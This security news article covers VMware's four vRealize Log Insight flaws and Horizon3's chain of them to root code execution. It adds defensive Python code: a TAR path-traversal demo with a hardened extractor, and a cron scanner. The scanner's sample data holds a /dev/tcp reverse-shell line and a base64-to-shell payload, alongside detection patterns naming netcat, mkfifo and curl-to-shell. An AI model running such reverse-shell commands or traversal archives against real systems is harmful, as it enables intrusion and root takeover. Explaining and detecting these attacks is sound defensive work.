VMware published patches last week for four vulnerabilities in its vRealize Log Insight product that, if combined, could allow attackers to take over the log collection and analytics platform.
This week, a proof-of-concept exploit chain has been released by security researchers, along with detailed explanations for each vulnerability, meaning in-the-wild attacks could soon follow.
“Gaining access to the Log Insight host provides some interesting possibilities to an attacker, depending on the type of applications that are integrated with it,” researchers with penetration testing firm Horizon3.ai said in their analysis of the flaws.
“Often logs ingested may contain sensitive data from other services and may allow an attacker to gather session tokens, API keys and PII. Those keys and sessions may allow the attacker to pivot to other systems and further compromise the environment.”
Vulnerabilities can together unlock a powerful attack
This is an interesting case that showcases a common reality of modern software security: no single vulnerability leads to a significant compromise on its own, but chaining several of them together unlocks a powerful attack.
The first vulnerability, tracked as CVE-2022-31704, is described by VMware in its advisory as a broken access control without offering any additional details about where it might be located. However, the manual workaround script published by the company alongside the product updates offered some clues.
The script simply added a firewall rule that blocked access to TCP ports 16520 through 16580. Based on Horizon3's investigation and notes in the vRealize Log Insight documentation, these ports are used for communication over the Apache Thrift RPC (remote procedure call) framework. RPC is an inter-process communication mechanism through which one process, often on another host, directs a second process to execute a particular procedure; whether the caller has to prove who they are before that procedure runs is entirely up to the server.
“This information tells us that the vulnerability is likely in an RPC server,” the researchers said in their writeup. “Next, we log into the running system and find that TCP port 16520 is created by a java application.”
The researchers managed to track down the component responsible for starting a Thrift RPC server which exposes several remote procedure calls. They then built a simple Thrift RPC client to make one of those calls and saw that the calls went through and were executed without authentication, hence the broken access control.
But this vulnerability alone, while providing access to potentially powerful RPCs, is not sufficient by itself to execute malicious code.
Second vulnerability is a directory traversal issue
Enter the second vulnerability, CVE-2022-31706, which is described as a directory traversal issue. Directory traversal is a condition in which an attacker-supplied path, typically one containing ../ sequences or an absolute path, is used without validation, letting the attacker read or write files outside the directory the application intended.
While looking at the RPCs exposed by the Thrift RPC server, the researchers found one called remotePakDownloadCommand that downloads a file with the .pak (probably package) extension and places it in the /tmp/ directory. Another RPC called pakUpgradeCommand can then be used to invoke a Python script that unpacks this file.
These two commands are used to perform system upgrades so the researchers realised the directory traversal flaw is probably somewhere in the processing of pak files.
It turns out pak files are TAR format archives and their processing before extraction involves validating signatures, integrity checks, manifest checks, and several other steps.
"If we can construct a tar file that passes all of these checks, we will hit line 493 and extractFiles will parse our malicious tar, allowing us to write a file with contents of our choosing to any place on the file system," the researchers said.
“Admittedly, we spent some time manually constructing a tar file that would pass all of these checks before we realised that we could simply use a legitimate upgrade file with a small modification to accommodate our payload.”
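To show the mechanism the researchers describe in general terms (an archive that passes its pre-extraction checks but whose member names point outside the extraction directory), here is an added example in Python. It is not part of Horizon3's proof-of-concept or of VMware's code. It builds a small TAR archive with a traversal member, computes where a check-free extractor that simply joins the destination with each member name would write it, and contrasts that with an extractor that rejects any member whose resolved path, link target or file type is unsafe. The archive contents, member names and destination paths are constructed for the demonstration; the signature, integrity and manifest checks that precede extraction on the real product are out of scope here.

```python
import io
import os
import tarfile
import tempfile


def build_tar(members):
    """Build a TAR archive in memory from {name: bytes}. Names are stored verbatim,
    so a key such as '../../escape.txt' yields a traversal member (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def naive_targets(tar_bytes, dest):
    """Where an extractor that does os.path.join(dest, member.name) with no validation
    would write each member. os.path.join discards dest for absolute names, so '/abs/x'
    lands at /abs/x, and '../../x' climbs out of dest."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return [os.path.realpath(os.path.join(dest, m.name)) for m in tar.getmembers()]


def _inside(root, path):
    root = os.path.realpath(root)
    return os.path.commonpath([root, os.path.realpath(path)]) == root


def is_unsafe(dest, member):
    """Hardened check: a member is unsafe if it resolves outside dest, if it is a symlink
    or hard link whose target resolves outside dest, or if it is anything but a file/dir."""
    target = os.path.join(dest, member.name)
    if not _inside(dest, target):
        return True
    if member.issym():
        # symlink targets are relative to the link's own directory
        return not _inside(dest, os.path.join(os.path.dirname(target), member.linkname))
    if member.islnk():
        # hard link targets are relative to the archive root
        return not _inside(dest, os.path.join(dest, member.linkname))
    return not (member.isfile() or member.isdir())


def safe_extract(tar_bytes, dest):
    """Reject the whole archive if any member is unsafe; otherwise extract and return names."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        members = tar.getmembers()
        bad = [m.name for m in members if is_unsafe(dest, m)]
        if bad:
            raise ValueError(f"refusing to extract, unsafe member(s): {bad}")
        # Defence in depth: use the stdlib 'data' extraction filter where this Python has it.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, members=members, **kwargs)
        return [m.name for m in members]


def demo():
    """Run both extractors against a traversal archive and a benign one in a throwaway
    directory; returns the outcomes so they can be checked programmatically."""
    evil = build_tar({"../../escape.txt": b"written outside the unpack directory\n"})
    benign = build_tar({"upgrade/manifest": b"version=8.10.2\n"})  # constructed content
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "unpack", "pak")
        os.makedirs(dest)
        naive_escaped = not _inside(dest, naive_targets(evil, dest)[0])
        try:
            safe_extract(evil, dest)
            safe_rejected = False
        except ValueError:
            safe_rejected = True
        extracted = safe_extract(benign, dest)
        written = os.path.isfile(os.path.join(dest, "upgrade", "manifest"))
    return {"naive_escaped": naive_escaped, "safe_rejected": safe_rejected,
            "benign": extracted, "benign_written": written}


if __name__ == "__main__":
    print(demo())
```

The important design choice is that validation happens on the resolved path (realpath plus commonpath) rather than on the raw string, so a member named a/../../x or a symlink that first points outside the tree is caught, and that one bad member rejects the entire archive rather than being skipped.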
vRealize Log Insight forced to download malicious pak file
At this point, the researchers had the information required to force the vRealize Log Insight product to download a malicious pak file without authentication and then place a malicious payload anywhere on the system. Except for one problem: invoking the remotePakDownloadCommand requires a node token to work, a unique value generated per instance of Log Insight.
While this token is not directly available to an unauthenticated user, it can be leaked by invoking other RPCs such as getConfig and getHealthStatus. This is likely the information disclosure issue that VMware tracks in CVE-2022-31711 in its advisory.
Using the leaked token, the Horizon3 researchers were able to construct a proof-of-concept exploit that places a new entry into crontab — the task scheduling mechanism on Linux-based systems — which, when executed, opens a reverse shell with root privileges back to the attackers.
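The persistence step here, a crontab entry that launches a reverse shell as root, is also a natural place to look when hunting for this kind of compromise. The following Python snippet is an added example and is not one of the indicators Horizon3 published: it parses /etc/crontab- and /etc/cron.d-style entries (five time fields, a user, then the command) from a constructed sample and flags commands that carry common reverse-shell or staged-payload constructs. The patterns are heuristics chosen for illustration; a real hunt should also diff the cron files against a known-good baseline, and per-user crontabs (which have no user field) need a slightly different parser.

```python
import re

# Constructed sample in /etc/crontab format: three routine entries and two that look like
# scheduled reverse shells. Not real indicators from Horizon3 or VMware.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 3     * * *   loginsight /usr/lib/loginsight/rotate-logs.sh
* * * * * root bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'
*/5 * * * * root echo cm0gL3RtcC9mOyBta2ZpZm8gL3RtcC9m | base64 -d | sh
"""

# Heuristics (assumptions, not an exhaustive list): each pattern names a construct commonly
# seen when cron is abused for reverse shells or staged payloads.
PATTERNS = [
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash in a cron job"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e"),
    (re.compile(r"\bmkfifo\b"), "named pipe (classic nc reverse shell)"),
    (re.compile(r"base64\s+(-d|--decode)\s*\|\s*(sh|bash)\b"), "base64-decoded payload piped to a shell"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"), "remote script piped to a shell"),
    (re.compile(r"\bpython[23]?\b.*socket"), "python socket in a cron job"),
]


def parse_system_crontab(text):
    """Yield (line_no, user, command) for system crontab lines. Comments, blank lines and
    variable assignments (e.g. PATH=...) are skipped."""
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
            continue
        fields = s.split(None, 6)
        if len(fields) < 7:
            continue
        yield n, fields[5], fields[6]


def suspicious_cron_entries(text):
    """Return [(line_no, user, reasons)] for entries whose command matches any heuristic."""
    hits = []
    for n, user, cmd in parse_system_crontab(text):
        reasons = [why for rx, why in PATTERNS if rx.search(cmd)]
        if reasons:
            hits.append((n, user, "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for line_no, user, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {line_no} (user {user}): {reasons}")
```

Run it against the real files with something like `suspicious_cron_entries(open("/etc/crontab").read())`, and extend the pattern list with whatever tooling your own environment would never legitimately schedule; the second flagged sample line shows why a base64-to-shell pattern matters, since the encoded command hides the mkfifo that the plain-text heuristic would otherwise catch.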
The fourth vulnerability in VMware's advisory is a deserialisation issue tracked as CVE-2022-31710 that can be exploited to crash the system leading to a denial-of-service condition. This vulnerability is not required for the exploit chain that results in remote code execution.
Log Insight is used to collect and analyse logs from local networks so it's not typical to find such systems exposed to the internet. Shodan searches of the public IP space revealed only 45 instances.
However, if an attacker gains access to the local network, which can be achieved in many ways, and the Log Insight server is not firewalled off, it can be compromised and potentially used for lateral movement because of the sensitive data it might contain.
The Horizon3 researchers released indicators of compromise that allow organisations to check their deployments for signs of exploitation. VMware has released a workaround script that blocks traffic to the port numbers associated with the Thrift RPC server, as well as version 8.10.2 of vRealize Log Insight, which patches the flaws.